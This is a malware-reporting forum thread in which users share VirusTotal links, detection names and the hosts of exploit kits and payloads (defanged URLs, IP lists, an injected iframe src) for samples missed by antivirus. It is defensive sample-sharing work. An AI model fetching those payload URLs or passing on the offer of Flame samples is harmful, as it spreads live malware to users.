http://virusscan.jotti.org/en/scanresult/a2976e42d5d70b9d725f3c634aaa310f1bdad145
detected by Malwarebytes as Trojan.Dropper
uploaded to avast and SAS ;)
-
Java/Exploit.CVE-2012-0507.AP
https://www.virustotal.com/file/89c110e01a7c7769f4acace2007e48f5549d0dee757598e68570338911306f72/analysis/
reported to avast! ;)
-
Java/Exploit.CVE-2012-0507.AP as reported by true indian is known to be a malicious backdoor Trojan, which runs without user knowledge and allows remote access to a PC for cyber criminals. This malware uses various files that exploit Java vulnerabilities. When it infects your system, hackers might get access to personal information like passwords or files.
Trojan.Maljava has the ability to block some programs from running, to make you think that your PC is at high risk. Every file of it is considered to be malicious, so if you find any - remove it as soon as possible under the guidance of a qualified removal expert.
On Vista & Win 7 malcode files can be found as:
%AllUsersProfile%\~[random]
%AllUsersProfile%\~[random]r
%AllUsersProfile%\[random].dll
%AllUsersProfile%\[random].exe
%AllUsersProfile%\[random]
%AllUsersProfile%\[random].exe
%UserProfile%\Desktop\Trojan.maljava.lnk
%UserProfile%\Start Menu\Programs\Trojan.maljava\Uninstall Trojan.maljava.lnk
%UserProfile%\Start Menu\Programs\Trojan.maljava\Trojan.maljava.lnk
To be protected alwats make sure you have the latest java version installed if you have java installed, so you are not vulnerable, check: http://www.java.com/nl/download/installed.jsp
polonus
-
TR/Spy.Banker.Gen
https://www.virustotal.com/file/976e238360bc2febba432ce968705731743518879567caeaa144f15624c01a27/analysis/
Trojan-Banker.Win32.Bancos.uga
https://www.virustotal.com/file/928fb059c5569fd369b99aa20034119384422bf927a3c10a7e8e1306afa7a090/analysis/
reported to avast! ;)
-
Worm.Win32.Flame.a
https://www.virustotal.com/file/029bcd72dc2ca4b31778cf4ee086038d8bd6c59ed2ed485e247aed56f909f881/analysis/
TR/Flame.A.8
https://www.virustotal.com/file/1999c26614de76068d9431b8184e933c63b5813b76a95fac6cc4b47e93832c23/analysis/
reported to avast! and uploaded to MBAM 8)
PM me if u want samples for flame ;)
EDIT: detections added
-
TR/Spy.ZBot.aav
https://www.virustotal.com/file/40bd4160bb37ccf944799129463933a61f32bbb306a2dac3f95a9d3cb19598f5/analysis/
reported to avast! :)
Edit: detection added
-
Windows Antivirus Rampart - FakeVimes
https://www.virustotal.com/file/4d0a1e0213904a7d397d51e38c4aaed26f8824984e9ca162505ea22a9ffae15c/analysis/
reported to avast! ;)
EDIT: detection added
-
Windows Malware Firewall - new FakeVimes rogue
https://www.virustotal.com/file/b4d5db39daf38597453fb3acb9c403976fea86508b599e506d144ac42206d70b/analysis/
reported to avast!
edit: detection added
-
Missed JExploiS/t-Blacole.cx /fake LinkedIn Spam lrading to this malware via CVE-2011-3521 vuln, see: htxps://www.virustotal.com/file/d3af335637df9a1b29b9ed5e1cc0db6e60f313039ec758bfccfe0acebfb1e8d8/analysis/
see: htxp://zulu.zscaler.com/submission/show/e99c8ecf9c2b888f079a9ef0655ee90e-1338581545
IP address: 187.85.160.106, 184.106.200.65, 50.57.88.200, 50.57.43.49
Also found here that there was LinkedIn spam
Sop the payload is also here:
The payload is on immerialtv dot ru:8080/forum/showthread.php?page=5fa58bce769e5c2c hosted on the following IPs:
50.57.43.49 (Slicehost, US)
50.57.88.200 (Slicehost, US)
184.106.200.65 (Slicehost, US)
187.85.160.106 (Ksys Soluções Web, Brazil) See this address for our find
Plain list for copy-and-pasting:
50.57.43.49
50.57.88.200
184.106.200.65
187.85.160.106
all this reported to virus AT avast dot com
polonus
-
Another one here, Trojan:JS/BlacoleRef.W missed: htxp://zulu.zscaler.com/submission/show/f58b27f17b497ce2c367cb12a7694ff5-1338582640
see VT results -> htxps://www.virustotal.com/file/38addb00e677ec62da4d04da6344107aeaa00ba204ab3f02d9806d3e0284e85d/analysis/
see: htxp://urlquery.net/report.php?id=62312 mdl_Leads to exploit kit detected 2012-06-01 13:22:00 live malware,
which avast should normally detect as HTML:RedirME-inf [Trj]
Detected BlackHole exploit kit HTTP GET request
- Detected malicious injected iframe -> iframe src='htxp://mazdaforumi.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c
(the one we reported in the previous posting)
We see this is an ongoing problem through a malware campaign (5 hrs ago, 6 hrs ago) when we search for: htxp://www.google.nl/search?sugexp=chrome,mod=9&ix=h9&sourceid=chrome&ie=UTF-8&q=iframe+src%3D'http%3A%2F%2Fmazdaforumi.ru%3A8080%2Fforum%2Fshowthread.php%3Fpage%3D5fa58bce769e5c2c
reported to virus AT avast dot com,
polonus
-
Another Trojan:JS/BlacoleRef.W, not detected, htxps://www.virustotal.com/file/07ca7776a566cc872c2fd0602da135072e780a10b062175e00c2710f3f63a365/analysis/
from: htxp://zulu.zscaler.com/submission/show/af5d670395a65113f12e98337f95bb64-1338587387
see: htxp://urlquery.net/queued.php?id=62630
- Detected BlackHole exploit kit HTTP GET request
- Detected malicious injected iframe
reported to virus AT avast dot com
-
Hi Polonus,
Not a new exploit method given in your post regarding "wire-transfer.htm".
I've seen the exact algorithm somewhere else.
-
Hi !Donovan,
Well then they are running a new campaign with this again. So old wine in new sacks, so to say. Thanks for your evaluation.
I just report what I see happening while scanning and when I cannot get a avast detection, I immediately report back to the avast base,
well analysts. I think you are developing a very good "feel" for the various varieties of malcoded scripts out there,
as it is inspiring for both of us,
polonus
-
Hi malware reporters ;D
Trojan-FakeAV.Win32.Agent.rkx
https://www.virustotal.com/file/e1aaa0a98fc43f47d0d5777429631eaa4f8449bdbdbc268fb03d48fc910df8a3/analysis/
trojan winlock
https://www.virustotal.com/file/36ad11081c1b29b3540b918337478740921ddec0a90c45aabc0cc367f34e6763/analysis/
reported to avast! ;)
EDIT: detections added
-
From the latest VT Comments:
Weelsolf BotNet (9-40)
https://www.virustotal.com/file/f25296744471f5f29718832998c20ac15bb968f426ae2259b5bdcb57a249d47f/analysis/
Rouge AV Live Security Platinum (8-42)
https://www.virustotal.com/file/cca6e3ecef865d2a5623c2e3b04a27d96c10abc90c5e67a3b5477d7ba215c438/analysis/
-
Hi Friends,
found by makcunknown
trojan ransom.
https://www.virustotal.com/file/d5faa80f5c8c083d37bc276f5dfe1598599fa07f67e8c9d55bbf8c41caa5bb62/analysis/
reported to avast!
EDIT: detection added
-
undetected malware
https://www.virustotal.com/file/b11c2b9b1dff86529ae399eb2bb2181e8edf720c722029a9000f6a7adad7248d/analysis/1338741938/
-
reported to virus AT avast dot com: https://www.virustotal.com/file/524b01eeee5d8c40918f552a1eb3543c37a3a773af9505070ecab24ccc7b31a7/analysis/
polonus
-
No AV Detect..yet.
https://www.virustotal.com/file/2a8d08b52bad72da37b15e56a0f8bfb41bee1188c15808e7e5a0a2b0a5ccec35/analysis/
See comment from mwsniffer
-
See: htxp://vscan.urlvoid.com/analysis/e88bca0faa4901001e23d338727d9327/aW5kZXg=/
See: htxp://sitecheck.sucuri.net/results/www.wandelhalle-hamburg.de
reported to virus AT avast dot com,
polonus
-
Trojan.Mayachok.17105 detects only by Dr.web
https://www.virustotal.com/file/1091ad4f18ada3c85bd69ac724e32f31585fc1a15a432a21e92d03087066777b/analysis/1338983553/
-
Hacktool or backdoor not detected by avast: htxp://zulu.zscaler.com/submission/show/61e0aaa070b0a7ac40098af1a3a433f0-1338986102
and VT results: htxps://www.virustotal.com/file/80725340b7830288dfe4969eb070a542516a040efc2c1e6473b6051d086f46ab/analysis/
reported to virus AT avast dot com,
polonus
-
https://www.virustotal.com/file/b918547ded8f978ba5bfc2f1dd48cd2bf620635d18c869b1a3c513dd8efa2edf/analysis/1338986572/
-
TR/Flame.A.7
https://www.virustotal.com/file/0a96ba671bebc78e705ae2d2360bf49a3f34f46a7522555eec47b31d90069c71/analysis/
reported to avast! 8)
Edit: detection added
-
Mal/FBJack-A
detection missed...contains obfuscated Iframe..new Facebook HTML malware/spam..redirects to faked Jason Bieber video
https://www.virustotal.com/file/57726a46a0debac32dec0a06d1fa9df2b79566f2f8a2ef8754a66775e86f939c/analysis/1339141426/
reported to avast!
-
Malware sent yesterday to avast but still no detection ?
https://www.virustotal.com/file/06f2dde9b6e726480e52f02fc3af75278fedc1270764b10dbbfb349a9876b23b/analysis/1339248959/
-
Hi MDRockstar,
This because the suspicious file ltastd.exe is flagged as riskware. It might be opened by avast to be run first in sandbox for evaluation,
polonus
-
Not many of the larger AVs are detecting it either. Many that are are using heuristics and are calling it PUP or riskware.
-
Hi DavidR,
Thank you for confirming the PUP status. The poster probably sent it because of this report: http://systemexplorer.net/db/ltastd.exe.html
polonus
-
Detects by Dr.web as Trojan.SMSSend.2917.
https://www.virustotal.com/file/551d2509a5d4769e1212c47116300795f0dc8708fe50ce43683d14c0fe8d3dff/analysis/1339428024/
-
This topic shall be closed,samples can be sent directly to AvastLab.If you want to increase your post count,think of something smarter.No offense but it's the true.
-
undetected malware
https://www.virustotal.com/file/8a79715f3e63650f8897a24ffe8b0301f447958b303ecd45ab00ac883ecbaf4f/analysis/1342451827/
-
Was cleaning a computer infected with win8 security system and found that avast does not detect this rootkit that comes bundled along with this rogue.
https://www.virustotal.com/file/3945861e049199662423a539e96b0c49a904501e9aef02faa4da678633cbcc37/analysis/
Reported to avast!
-
Hi true indian,
Subject had already been mentioned extensively in an earlier thread here: http://forum.avast.com/index.php?topic=104668.0
Why did not you react there?
polonus
-
Somebody posted this on our avast! FB wall..
https://www.virustotal.com/file/da5e7057fd1bd488c5e9ff8fede941f00d32d58bae8f3ca4b5b8096189d4768f/analysis/1347769210/
Reported to avast!
-
see the sigcheck and first seen by VT
-
see the sigcheck and first seen by VT
Sigcheck
publisher................: Oracle Corporation
product..................: Oracle VM VirtualBox
internal name............: VirtualBox.exe
copyright................: Copyright (C) 2009-2011 Oracle Corporation
original name............: VirtualBox.exe
file version.............: 4.0.4.70112
description..............: Oracle VM VirtualBox Manager
First seen by VirusTotal
2012-09-11 08:39:32 UTC ( 1 minute ago )
I had checked for a digital signature earlier itself when i downloaded it..and it didnt have one so i guess this is 100% Malware.
P.S. I like the name given by SAS on VT: Heur.Agent/Gen-FakeAvast ....interesting.. ;D
-
you may run it at treathexpert to see what it does
-
you may run it at threatexpert to see what it does
I dont think it does really anything much...i couldnt get into my threat expert account because i forgot my username and password.
http://anubis.iseclab.org/?action=result&task_id=12633cb1584a7e084498422305d2e74d6&format=html
-
Hi true indian,
Can you confirm you also posted this here: http://forums.malwarebytes.org/index.php?showtopic=115632
polonus
-
Hi true indian,
Can you confirm you also posted this here: http://forums.malwarebytes.org/index.php?showtopic=115632
polonus
yes that was me who posted this there...
Avast! now has detection... ;D
-
Again some piece of Malware on avast! FB wall..
https://www.virustotal.com/file/13fdec273e3240acbc1ea323a2c4a4c0c64cd6d9da04107b51315a0d28ccc2d4/analysis/
it [rar file] extracts a hidden text file called significant.txt which contain BKDR/symmi
Reported to avast!
-
Trojan-Ransom.Win32.Gpcode.dm
https://www.virustotal.com/file/c0603fcd04d8e2fe78559a1fc07d0d8e569c08225ecb864850edd9511b11a439/analysis/1347881864/
sent to avast! ;)
edit: latest streaming update detects this now after sending.
-
Microsoft IE 0 Day
https://www.virustotal.com/file/75bd9b405fd0239644ab0c6aae6579096a407ddedd3c6139219f8c8e8f5b2db3/analysis/
reported to avast! 8)
-
Again some malware posted on avast facebook wall...
https://www.virustotal.com/file/c25a1c46aa91763bf657fe0d8d89ef7ce6ffa3502a68e7b1bcbbfa36da210600/analysis/
reported to avast!
-
Payload of IE 0-day
https://www.virustotal.com/file/a5a04f661781d48df3cbe81f56ea1daae6ba3301c914723b0bb6369a5d2505d9/analysis/
reported to avast! 8)
-
Hi true indian,
As you can see the payload is the infostealer bancos y trojan variant. For Threat Expert awareness of this file and what subfiles it creates, see: http://www.threatexpert.com/files/111.exe.html
polonus
-
Again Malware on avast! facebook wall...
https://www.virustotal.com/file/2d9b9a8860ce97177891ca1bb5e7faba880eb079e2d8025762d6a72518e96a90/analysis/1348247024/
reported to avast!
-
I'm not sure if it's malware, but i found it and it looks suspicious:
1 file
https://www.virustotal.com/file/fd115514291e2855c204decc03270628e3dbe7c8da0dc797c1ce1389fd2a0ba8/analysis/1348657526/
2 file
https://www.virustotal.com/file/7abc66b037c23f80fbb861e02f894900c9b9590bf70b10852d28a84229109aa4/analysis/1348657408/
3 file
https://www.virustotal.com/file/e3f10f3119da4f4a54c5c99508c5314265f177046898b3b7f811e3febeb6e0d1/analysis/1348657652/
-
@ sality
Have you sent the files to avast! labs via e-mail or from the chest??
-
Yep, I send yesterday.
-
Yep, I send yesterday.
yes thats good...keep sending them if they are not detected :)
-
These temp files were never found to ne malicious: http://www.threatexpert.com/files/100.exe.html
polonus
-
Yes, virustotal said it's clean, but i started it on my virtual machine, and it was weird. I send it to the avast too.
-
New Dorifel-variant downloading the zero access rootkit not detected: https://www.virustotal.com/file/6d32a06be42f9c9b09038279d5121c8f9edd3fc3d5c670f3691d20d92dcddbff/analysis/1348728915/#additional-info
Time for TDSS killer investigations from our malware removal experts, zero access rootkit to perform clickfraud is a mighty nasty threat at the moment going under the av radar. The new Dorifel variants seems to be more aggressive as the former...
Malware produces a new unique hash making it harder to detect, This domain was registered: https://forum.perfect-privacy.com/member.php/?u=4578
The ransom hijacker uses a picture of Mohamed Ali, formerly known as Cassius Clay A special Dorifiel decrypter should be used for the encrypted documents:
http://www.surfright.nl/nl/support/dorifel-decrypter. Information from SurfRight's and kudo's go to Mark Loman and Fabian Wosar...
polonus
P.S. Regarding Perfect Privacy Forum, like to add the following security information:
web bug detector gives a webbug on that very page: https://forum.perfect-privacy.com/member.php/cron.php?s=073e2639f73d26cb026449410960b785&rand=1351336814
so that is not very encouriging for establishing the right privacy circumstances,
and makes the site vulnerable to attacks, see: http://drupal.org/node/1080486 (link article author Drew Mathers).
It should be protected from the protect it from the webserver layer.
Executing code on your webserver from remote is always a security risk.
cron.php only runs once, so the risk is not that extreme,
but users of Drupal should be aware to not give access.
Renaming cron.php is no option, because it is security through obscurity.
Private cache control is alerted for not following best practice, no secure attribute for cookie bb sessionhash
settings not secure for x-content-type-options N/A x-xss-protection N/A x-frame-options
N/A x-content-security-policy N/A strict-transport-security N/A
Check this yourself using the Recx Security Analyzer extension on that page.
Privacy ratting does not go further as a meagre 70,
Damian
-
Found via Facebook: http://zulu.zscaler.com/submission/show/f635b729ae5ed08dfc8831847acc9661-1349284508
redirects to: http://zulu.zscaler.com/submission/show/04d2c77ccb3d047a3fa861f651a3b3fa-1349284530
Reported this to virus AT avast DOT com
-
Malware On Avast! FB Wall
https://www.virustotal.com/file/838f9ca46793bd5c5f0735d2e9a67119b5166f71813ea9449b7e03dd7d28f00f/analysis/1349348552/
sent to avast! labs..
-
Malware On Avast! FB Wall
https://www.virustotal.com/file/85a9a7a7d9fd52c9d3bce6a31733b0e4f71f31d602c161588aa86a42b11bf99c/analysis/1349411730/
sent to avast!
-
Malware On Avast! FB Wall
https://www.virustotal.com/file/dbd19a5b301e20b6dfaed8da671d0ce8b0f81a671352727ee579942ba23aa81c/analysis/
sent to avast!
-
Malware On Avast! FB Wall
https://www.virustotal.com/file/1c52c6efc89a8bb32c8dd75e77e72bb6d61ba5a31dc5fa56a143e7b9151a1688/analysis/1350048692/
sent to avast!
P.S. it has a avast icon too ;D
-
Exploit.HTML.IframeRef!IK
https://www.virustotal.com/file/d280279a32686ba766b8c6375e9f79338d1ea0c750752ad2090d5cba2feafc7f/analysis/1350208298/
reported to avast!
-
Good catch. :)
-
As an Update to my previous detection of Iframe.The site that is loaded by the Iframe is already detected: http://vscan.novirusthanks.org/analysis/6674455f2c5206efa75a21c86081a339/dGVzdC1odG0=/
So we should be protected anyway.
-
Malware on avast! FB Wall
https://www.virustotal.com/file/fa7fd9b5686c3f0410bd8e9f2ad1bd638389584b2d96112d60eec59485d51375/analysis/1350970912/
reported to avast! ;)
-
Hi true indian,
We have detection now: https://www.virustotal.com/file/fa7fd9b5686c3f0410bd8e9f2ad1bd638389584b2d96112d60eec59485d51375/analysis/
we are being protected,
polonus
-
Not detected? http://zulu.zscaler.com/submission/show/59273a77959881472c65c7243ccb05e7-1351595253
see: https://www.virustotal.com/file/776303a0a9794f0abc8696c395892d84de37b050c5adb76e2f7fe64f594090e1/analysis/
alive and OVERDUE 2012-08-23 12:11:59
New analysis report to be found here: http://anubis.iseclab.org/?action=result&task_id=1d980218979be3ed4452737f984e83694&format=html
reported to virus AT avast dot com
polonus
-
Another one: http://zulu.zscaler.com/submission/show/b3dd2a02c23620b356526f878291ee61-1351612010
See: https://www.virustotal.com/file/ea1a86e40ae76052c7828153c600a8a9b1de438d7596977eadb252ee2a722847/analysis/
reported to virus AT avast dot com
polonus
-
Not detected? http://zulu.zscaler.com/submission/show/59273a77959881472c65c7243ccb05e7-1351595253
see: https://www.virustotal.com/file/776303a0a9794f0abc8696c395892d84de37b050c5adb76e2f7fe64f594090e1/analysis/
alive and OVERDUE 2012-08-23 12:11:59
New analysis report to be found here: http://anubis.iseclab.org/?action=result&task_id=1d980218979be3ed4452737f984e83694&format=html
reported to virus AT avast dot com
polonus
First seen by VirusTotal
2009-12-15 14:10:46 UTC ( 2 years, 10 months ago )
Emsisof: Riskware.Keygen.WinRAR (A)
Still in question for avast analysts if its to be detected or left alone.We may even have sandbox detection
-
Trojan.GBPBoot.1 new MBR infector :o
http://news.drweb.com/show/?lng=ru&i=2927&c=9
Reported to virus AT avast DOT com 8)
-
Probably a Trojan:
https://www.virustotal.com/file/87be42ea7c8de7fde284b9149352a6fab551d386f0c545e1c0ff6de61798d49e/analysis/1352363750/
Reported to virus AT avast DOT com. ;D
-
See: https://www.virustotal.com/file/be37b9b39f41510e4941e63528bf6e96/analysis/
Malware still alive: http://malc0de.com/database/index.php?search=filepop.co.kr%2Fdown_fs%2F00000001_fsetup_703_20.exe%09
should this be detected is the question:
First seen by VirusTotal
2011-05-31 09:56:00 UTC ( 1 year, 5 months ago )
Spreading via IP: hxtp://211.215.18.239/ which is being blocked by MBAM IP Blocker!!!
Reported all the discovered URL's to virus AT avast DOT com
-
See:https://www.virustotal.com/file/214713c0f6d00003fdbac583cc585fd6ce8256f2cdc3da43cf29bbe496cf180a/analysis/
&
http://minotauranalysis.com/search.aspx?q=8fa6c23df708ae478322bf3c17921917
polonus
-
Missed: https://www.virustotal.com/file/faf4ac103a1caf42c691f05e9a829cb3d7a0ab967956fadb28f064dd5eb07f4f/analysis/
reported to Virus AT Avast DOT com
-
Backdoor:Java/Jacksbot.A :o
EDIT: VT link removed..
reported to virus AT Avast DOT com
-
Suspicious for Trojan Downloader.
https://www.virustotal.com/file/91d48f6c435d0b4adec680a25dd809c9a3d9c497b7b6e64a41e1418bcf697e2d/analysis/1353393295/
reported to Virus AT Avast Dot Com
-
Hi true indian,
Was not this posted by your alter ego? http://forums.malwarebytes.org/index.php?showtopic=118370
polonus
-
Missed: https://www.virustotal.com/file/f61a6a3e1922ba9df7be668966efc8a7fc0183336539bb7da2f85f15fbd9ce28/analysis/
Reported to virus AT avast DOT com
-
(New) KaiXin Exploit Kit 1.1
https://www.virustotal.com/file/88af04ee7c18a3487e83b06b6c945dd858a4716de157a8d23f879eda47114ec2/analysis/
https://www.virustotal.com/file/9cf6c1f26c235b0922d1f20552403bb18e9cc660d6c1f4ff419426879719127a/analysis/
For more information see my comments.
~!Donovan
-
Hello,
I have submitted the file bellow 3 times to avast, however it still not being detected:
https://www.virustotal.com/file/27947b0c0acc357a8637f7d0d3dc27119bcf4fa3e68b07d2b3cf8e49c083db60/analysis/1354784726/
Thanks for your time!
-
Hi Tonanet,
It is being flagged here: http://www.isthisfilesafe.com/sha1/80DD271CB1A9A52A7467B15D16AA4D8DF447D398_details.aspx
Could be the avast shields flag it?
polonus
-
Hi !Donovan,
I went after the IDS alert for "Detected live KaiXin exploit kit" at urlquery.net and saw that DrWeb has a very good detection rate for this exploit kit malware detection
htxp://adsup.co.kr/pgm/ avast detects here: https://www.virustotal.com/file/5004b899bc5c8dd17e3b54cf28f930484e9f1e6c36de1a28a61de2c9cd61cc76/analysis/
htxp://204.13.71.29/home/flash.html I get The network link was interrupted while negotiating a connection. Must be ZeroExploit shield intervening or ABP malware block list enabled...
These are the IDS sigs: http://comments.gmane.org/gmane.comp.security.ids.snort.emerging-sigs/17956 (info author = gmane)
Emerging Threats Daily Rulesets update: http://www.emergingthreats.net/2012/11/
polonus
-
Hello Polonus,
Thanks for the reply.
It seems to be a new file, as this one isnt detected by Avast, AVG or Panda with the latest definitions...
Thanks for your time,
Tonanet
-
Hi Tonanet,
Yes, will be reported to virus AT avast dot com,
polonus
-
New Unknown Malware: http://certcc.ir/index.php?name=news&file=article&sid=2293
According to Crysis its batch wiper...
reported all samples to virus AT avast DOT com. 8)
-
See: http://labs.alienvault.com/labs/index.php/2012/batchwiper-just-another-wiping-malware/?utm_source=rss&utm_medium=rss&utm_campaign=batchwiper-just-another-wiping-malware (article author = jiame biasco) Quate from Jiame Biasco:
We don’t have details about the infection vector but based on the dropper it could be deployed using USB drives, internal actors, SpearPhishing or probably as the second stage of a targeted intrusion.
pol
-
Latest update on that malware news: http://www.securelist.com/en/blog/208194052/GrooveMonitor_Another_Wiper_Copycat (article author = Roel)
Malware does not funtion on 64 bits-Windows apparently,
polonus
-
https://www.virustotal.com/file/ca822605407966dbdf338b6596cbf08109b469d0535cf1b37f61a6eda69f754c/analysis/1355898491/ (https://www.virustotal.com/file/ca822605407966dbdf338b6596cbf08109b469d0535cf1b37f61a6eda69f754c/analysis/1355898491/)
-
Hi mrapi,
Here I also get a zero flag result: http://f.virscan.org/ezcddax.zip.html
As it is crack MS it should be suspicious by nature,
polonus
-
Missed: https://www.virustotal.com/file/bf8b0bc0c8e1db52d94719fb01db1765/analysis/
reported to virus AT avast DOT com
-
https://www.virustotal.com/file/d8f57888cfe31d104b04bc30747120d9e1a69b2a1f82c7165936fc45f07ccfba/analysis/1356492745/
https://www.virustotal.com/file/99a2c01acb8b237f7ec3d526533cde343df64c8e6d0dd5e7afe004beeff2d051/analysis/1356492737/
https://www.virustotal.com/file/b24f4498fc40fc8b80bd79c0364ff3dbe2fba5379fe4322988a81f55ac8c2cca/analysis/1356492726/
https://www.virustotal.com/file/e1f7108d21edb1b836ad96b7b7d26ec82b8d1d7e11ff7a3a1061308ded0f59fb/analysis/
2 Tepfer trojans and 1 Lockscreen Missed and not being detected even after being reported constantly by me >:(
Reported again virus AT avast DOT com
-
This one missed: https://www.virustotal.com/file/d8f57888cfe31d104b04bc30747120d9e1a69b2a1f82c7165936fc45f07ccfba/analysis/
See: http://siteinspector.comodo.com/public/recent_detections/show_website?url=http%3A%2F%2Fsecegbiw.ru
See: http://zulu.zscaler.com/submission/show/4ca58b921729091c2f7df9dc8a9cf884-1356435452
polonus
-
Win32/Reveton.N
https://www.virustotal.com/file/4420885eb5e32c29f344691c36ff3732c2244e2704a28f5fd7c0f6ed90501493/analysis/1356664948/
Reported to virus AT avast DOT com
-
Trojan
https://www.virustotal.com/file/78d356dd295f27ba3b893beed6492a40f7feb8bfb4f2ed3e3f717beb84dbc2a0/analysis/
Already submitted throught chest.
-
Trojan
https://www.virustotal.com/file/8389e8a4f61c818f521bd4c214d989f84ff7d451905f030494539eaf73503f81/analysis/
Submitted from email.
-
Suspicious
https://www.virustotal.com/file/5db455071ca1bcf62ebbda43ad94646c521c1d179fd5b49fa57c774e6a43fd2e/analysis/
Submitted from email.
-
Trojan
https://www.virustotal.com/file/53377d93e3dfdf32a05befde859b034379b924dc33f1fe8c457508c521e2689a/analysis/
Backdoor
https://www.virustotal.com/file/02bdf5cdb3ce4a36a950b181e624c178765552b1a62ec98c02279a4e38d58e91/analysis/
FakeAV
https://www.virustotal.com/file/5f3ed8095cb3e5f5a171454dfe90473a94970bd929d2e46e69359bcb2bce9b7f/analysis/
Submitted from email.
-
ZeroAccess
https://www.virustotal.com/file/63d13ceff8870228b6b0f2e08b0274541884e255c6c299908b37464d4afef24f/analysis/
Submitted from email.
-
Trojan
https://www.virustotal.com/file/78d356dd295f27ba3b893beed6492a40f7feb8bfb4f2ed3e3f717beb84dbc2a0/analysis/
Already submitted throught chest.
ZeroAccess
https://www.virustotal.com/file/63d13ceff8870228b6b0f2e08b0274541884e255c6c299908b37464d4afef24f/analysis/
Submitted from email.
Avast network shield is already blocking the websites that gives these 2 infections as bad URL's...so you dont need to worry about the sig detection....anyway,thanks for sending!!! ;)
Trojan
https://www.virustotal.com/file/8389e8a4f61c818f521bd4c214d989f84ff7d451905f030494539eaf73503f81/analysis/
Submitted from email.
First seen by VirusTotal
2012-09-16 23:40:32 UTC ( 3 months, 1 week ago )
you sure this still exists in terms of real life usage??
On everything else...i would say good catch!!!! but keep in mind a lot of the web infections get blocked by the network shield URL blocker before even we have sig detection...just see to it you dont report samples from already blocked URL's ;D
-
Found via a USB stick...its Ramnit!!!
https://www.virustotal.com/file/29defdc42517a3e5137ab0fe3d201a8f9d053fc669ca4dc6e172785a3e3c4dfb/analysis/1356753297/
Reported to virus AT avast DOT com
FakeAV
https://www.virustotal.com/file/73eb87b0012138c2120e0ecb5e503cf3/analysis/
sent to labs!
-
Adware (good detection rate).
https://www.virustotal.com/file/0f0cc0ac9f3bcdd540c566c690a072e8861c6cab268eb9e98534bfc7a6e59239/analysis/
sent to lab.
-
Hi true indian,
Found that here: 2012-12-26 [D] carlahahn dot de/jqYnYs8B.exe 1FE5C899B8DF52C198B1582CE15B30A4 39D96ED5A5DBFFF3A2EF5782851541356070AA8E 284672 82.165.87.2 M TE R MG UQ Data from VX Vault
DrWeb URL checker detects: Checking:htxp://carlahahn.de/jqYnYs8B.exe
Engine version:7.0.4.9250
Total virus-finding records:3513894
File size:277.50 KB
File MD5:4ff9db792185de2457cb3c6ddc91da53
htxp://carlahahn.de/jqYnYs8B.exe packed by FLY-CODE
>htxp://carlahahn.de/jqYnYs8B.exe probably infected with Trojan.Packed.196
polonus
-
Malware
https://www.virustotal.com/file/82d77152b6fe8b61267186db7b947d7ddc8e69e9fcd70f5720dc0fdcd08b58a5/analysis/
submitted to lab.
-
See: http://www.runscanner.net/lib/TOP.exe.html
and
http://www.pcpitstop.com/libraries/process/i/TPop.exe.html
Could well be that avast will detect this as a PUP (Possible Unwanted Program) when you try to run it for the first time....
polonus
-
brand new trojan
https://www.virustotal.com/file/5fd73990c07b9fed483678689ed03ade960bea8921a0be5514b7040653e7add5/analysis/
submitted to lab.
-
Hi spywar,
Did you check for shield detection? Did you report to virus AT avast dot com? See: http://www.processlibrary.com/directory/files/tibia/427525/
and http://www.threatexpert.com/files/tibia.exe.html
Here Bitdefender TrafficLight alerts this download link as malware: htxp://pedump.me/a5ea47f911614697d0b2ce85222909a1/
See: https://www.virustotal.com/url/b328e6eff71a370b3c5d37df4df0bd264154209f2e2a935866f6135c9cb6df74/analysis/1356652004/
All detections in the past were from NOD32 only ->
http://webcache.googleusercontent.com/search?client=flock&channel=fds&q=cache:eB2tyD05MPMJ:http://v.virscan.org/Win32/PSW.Tibia.NGI%2520trojan.html%2Bhttp://v.virscan.org/Win32/PSW.Tibia.NGI%2520trojan.html&oe=utf-8&hl=en&ct=clnk
polonus
-
Hi spywar,
Did you check for shield detection? Did you report to virus AT avast dot com? See: http://www.processlibrary.com/directory/files/tibia/427525/
and http://www.threatexpert.com/files/tibia.exe.html
Here Bitdefender TrafficLight alerts this download link as malware: htxp://pedump.me/a5ea47f911614697d0b2ce85222909a1/
See: https://www.virustotal.com/url/b328e6eff71a370b3c5d37df4df0bd264154209f2e2a935866f6135c9cb6df74/analysis/1356652004/
All detections in the past were from NOD32 only ->
http://webcache.googleusercontent.com/search?client=flock&channel=fds&q=cache:eB2tyD05MPMJ:http://v.virscan.org/Win32/PSW.Tibia.NGI%2520trojan.html%2Bhttp://v.virscan.org/Win32/PSW.Tibia.NGI%2520trojan.html&oe=utf-8&hl=en&ct=clnk
polonus
Yes checked for shield detection, submitted via "virus@avast.com" yes.
-
trojan downloader
https://www.virustotal.com/file/f77ab065b1a6051582646f576792a6e8c76cd5d0227b8d69b52a490cabee3b1f/analysis/
submitted to lab.
-
Ransomware
https://www.virustotal.com/file/2fba9a749f631961f7a0541dc75bec0a75268c02b41a8f26caa60982f0c39704/analysis/
submitted to lab.
-
Spywar,I hope you are checking the URL's from where you get the samples...and not reporting samples coming from URL's that network shield already blocks....btw,thats a banker malware not a ransom...its funny how even the big kaspersky misses that one. ;D
I even see you have a nice catch on malware that was out since past weeks and AV companies are tend to miss them..Keep up the great work!
-
they don't come from url ;D
-
trojan downloader (not from url)
https://www.virustotal.com/file/d95f3016c1aefd77ad80cef058b22c8cdbe88d6776d09f4e8cd352f15fc9bdd6/analysis/
sent to lab.
also, about 60 samples sent to lab.
-
1 week old certified malware
https://www.virustotal.com/file/aad3fd0acdb9610a921a8d4776b56254116a8122c434c066f2963c0d35f33385/analysis/
sent to lab.
-
1 week old sample
https://www.virustotal.com/file/6d46e93f812f504bba42c027ca380522d9d6359feb68ad553490701bfcee1242/analysis/
Detection ratio: 40 / 46
sent to lab.
-
Worm delf
https://www.virustotal.com/file/8941c06058682a75f43e5f0b24a85b99aaff9ba66b8c37e851cad35c5f51e3ab/analysis/
sent to lab.
-
1 week old sample
https://www.virustotal.com/file/6d46e93f812f504bba42c027ca380522d9d6359feb68ad553490701bfcee1242/analysis/
Detection ratio: 40 / 46
sent to lab.
the VT scan here is 4 days old....sure it is not detected?
-
Worm delf
https://www.virustotal.com/file/8941c06058682a75f43e5f0b24a85b99aaff9ba66b8c37e851cad35c5f51e3ab/analysis/
sent to lab.
this VT scan is 2 days old....sure it is not detected?
why not post latest VT scan ?
-
I scan foldr with PUP enable.
-
There really is no need to make a new post for every sample sent.
The other point, my particular hobby horse, this topic is pointless, these reports do nothing they can't be analysed, only sending the samples to avast does.
